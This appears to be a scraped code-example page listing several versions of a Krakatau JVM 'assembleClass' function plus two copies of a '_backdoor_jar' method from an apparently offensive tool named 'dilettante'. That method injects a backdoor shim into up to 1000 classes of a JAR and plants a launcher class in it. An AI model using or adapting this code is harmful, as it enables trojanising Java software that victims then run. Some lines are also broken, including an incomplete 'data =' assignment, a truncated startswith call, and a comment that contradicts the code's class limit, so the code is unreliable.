Beispiel #1
    def _backdoor_jar(self, jar_path):
        zp = zipfile.ZipFile(jar_path, "a")
        count = 0
        for zinfo in zp.infolist():
            filename = zinfo.filename
            # inject our backdoor shim into every class that's not an inner class or has a _ 
            # to not get too crazy, we'll backdoor the first 100 classes we see and stop
            # TODO: come up with a better way to speed this up
            if count < 1000 and str.endswith(filename, ".class") and "$" not in filename and "_" not in filename:
                data =
                # disassemble class with Krakatau
                stream = Krakatau.binUnpacker.binUnpacker(data=data)
                class_ = ClassFile(stream)
                source = Krakatau.assembler.disassembler.disassemble(class_)
                # don't want to overwrite the "static" method
                if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
                    count += 1
                    # add backdoor and assemble again
                    backdoored_source = "\n" + source + self.backdoor_shim
                    lexer = tokenize.makeLexer(debug=False)
                    parser = parse.makeParser(debug=False)
                    parse_trees = parser.parse(backdoored_source, lexer=lexer)
                    backdoored_class = assembler.assemble(parse_trees[0], False, False, filename)[1]
                    # write backdoored class to zip
                    logging.debug("backdooring class" + filename)
                    zp.writestr(filename, backdoored_class)

        zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
        zp.writestr("dilettante/sad_cat.jpg", self.image)
Beispiel #2
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    assembly = open(filename, 'rb').read()

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_tree = parser.parse('\n'+assembly+'\n', lexer=lexer)
    return assembler.assemble(parse_tree, makeLineNumbers, jasmode, os.path.basename(filename))
Beispiel #3
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    basename = os.path.basename(filename)
    assembly = open(filename, 'rb').read()
    assembly = '\n'+assembly+'\n' #parser expects newlines at beginning and end

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    return parse_trees and [assembler.assemble(tree, makeLineNumbers, jasmode, basename) for tree in parse_trees]
Beispiel #4
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    basename = os.path.basename(filename)
    assembly = open(filename, 'rb').read()
    assembly = '\n' + assembly + '\n'  #parser expects newlines at beginning and end

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
Beispiel #5
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    basename = os.path.basename(filename)
    assembly = open(filename, 'rb').read()
    if assembly.startswith('\xca\xfe') or assembly.startswith('\x50\x4b\x03\x04'):
        print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
        print 'Perhaps you meant to invoke the disassembler instead?'
        return []

    assembly = '\n'+assembly+'\n' #parser expects newlines at beginning and end
    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    return parse_trees and [assembler.assemble(tree, makeLineNumbers, jasmode, basename) for tree in parse_trees]
Beispiel #6
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    basename = os.path.basename(filename)
    assembly = open(filename, 'rb').read()
    if assembly.startswith('\xca\xfe') or assembly.startswith(
        print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
        print 'Perhaps you meant to invoke the disassembler instead?'
        return []

    assembly = '\n' + assembly + '\n'  #parser expects newlines at beginning and end
    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
    def _backdoor_jar(self, jar_path):
        zp = zipfile.ZipFile(jar_path, "a")
        count = 0
        for zinfo in zp.infolist():
            filename = zinfo.filename
            # inject our backdoor shim into every class that's not an inner class or has a _
            # to not get too crazy, we'll backdoor the first 100 classes we see and stop
            # TODO: come up with a better way to speed this up
            if count < 1000 and str.endswith(
                    ".class") and "$" not in filename and "_" not in filename:
                data =
                # disassemble class with Krakatau
                stream = Krakatau.binUnpacker.binUnpacker(data=data)
                class_ = ClassFile(stream)
                source = Krakatau.assembler.disassembler.disassemble(class_)

                # don't want to overwrite the "static" method
                if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
                    count += 1
                    # add backdoor and assemble again
                    backdoored_source = "\n" + source + self.backdoor_shim

                    lexer = tokenize.makeLexer(debug=False)
                    parser = parse.makeParser(debug=False)
                    parse_trees = parser.parse(backdoored_source, lexer=lexer)
                    backdoored_class = assembler.assemble(
                        parse_trees[0], False, False, filename)[1]

                    # write backdoored class to zip
                    logging.debug("backdooring class" + filename)
                    zp.writestr(filename, backdoored_class)

        zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
        zp.writestr("dilettante/sad_cat.jpg", self.image)